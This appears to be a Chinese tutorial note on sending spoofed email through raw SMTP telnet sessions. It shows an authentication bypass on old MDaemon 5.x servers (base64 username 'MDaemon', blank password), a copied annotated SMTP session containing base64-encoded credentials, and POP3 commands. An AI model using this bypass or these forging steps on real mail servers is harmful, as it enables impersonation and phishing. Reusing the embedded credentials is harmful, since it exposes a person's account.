Mail欺骗发信样本

漏洞比较早期，现在内部网络基本无法做这样的测试了。

以MDaemon 5.x 邮件服务作为靶服务器。

 

 

直接上命令

 

telnet ip 25 端口

其他邮件服务器可以直接这样编写 ，但是这个服务器不可以。

 

同时，md5.x 这个服务存在验证漏洞

mdaemon 5.X 存在验证漏洞
base64 编码
密码可以为空

220 xxx.com ESMTP MDaemon 5.0.5; Sat, 02 Aug 2003 00:51:06 +0200
EHLO localhost
250-xxx.com Hello localhost, pleased to meet you
250-ETRN
250-AUTH LOGIN CRAM-MD5
250-8BITMIME
250 SIZE 0
AUTH LOGIN
334 VXNlcm5hbWU6 (334 Username:)  //username 的编码
TURhZW1vbg== (MDaemon) //
334 UGFzc3dvcmQ6 (334 Password:)//
(blank password)

235 Authentication successful

 

#测试复制官方文本

telnet 192.168.0.1 25 ---------------------------------- 使用 telnet 命令连接服务器 25 端口

Trying 192.168.0.1... ------------------------------------正在连接服务器 25 端口

Connected to 192.168.0.1. -----------------------------连接服务器 25 端口成功

220 localhost ESMTP Postfix - by ExtMail ------------显示服务器标识 ( 修改main.cf 的smtpd_banner)

helo test.com --------------------------------------------向服务器标识用户身份，发信不要认证，跳过下面几步直接发送 mail from 命令

250 localhost

ehlo test.com --------------------------------------------ESMTP 命令,发信需要认证。

250-localhost

250-PIPELINING

250-SIZE 102400000

250-VRFY

250-ETRN

250-AUTH LOGIN PLAIN

250-AUTH=LOGIN PLAIN

250-ENHANCEDSTATUSCODES

250-8BITMIME

250 DSN

auth login ------------------------------------------------- 进行用户身份认证

334 VXNlcm5hbWU6

Y29zdGFAYW1heGl0Lm5ldA== ----------------------------------- BASE64 加密后的用户名

334 UGFzc3dvcmQ6

MTk4MjIxNA== ----------------------------------------------- BASE64 加密后的密码

235 authentication successfully ---------------------------- 身份认证成功

(535 authentication failed --------------------------------- 身份认证失败)

mail from: <[email protected]> ------------------------------ mail from 地址 [email protected]

250 ok ----------------------------------------------------- 命令执行成功

rcpt to: <[email protected]> -------------------------------- 递送给地址 [email protected]

250 ok ----------------------------------------------------- 命令执行成功

data ------------------------------------------------------- 数据传输初始化

354 End data with .----------------------------------------- 开始传输数据

发到本系统中域名下的账户可跳过身份认证。

#测试复制官方文本

 

个人测试不需要使用身份验证

 

正确的发信格式

From: [email protected]

To: [email protected]

Date: Mon, 25 Oct 2004 14:24:27 +0800

Subject: test mail

Hi, test2

This is a test mail, you don't reply it.

要点，一定要写全，而且这些需要手写模范正规邮件格式

 

------------------------------------------------------------ 数据内容,包括BASE64加密后的邮件内容, 以 CRLF.CRLF 结束数据传输

250 OK: queued as 2F6DE3929--------------------------------- 命令执行成功

quit ------------------------------------------------------- 结束会话

221 Bye

Connection closed by foreign host .------------------------- 断开连接

 

PS:

其他邮件cmd命令

mail from:<address>//邮件发送方
rcpt to:<目的地址>//邮件接收地址
data//告诉服务器一下就是邮件内容部分
from:<目的地址>
subject:主题
data:正文内容
.结束
一下是查看pop3服务器下面自己邮箱的邮件
telnet address 110
user //用户名
pass//密码
stat//查看邮箱状态
list
list <number>
retr<number>//查看具体一封邮件（包括邮件路由信息）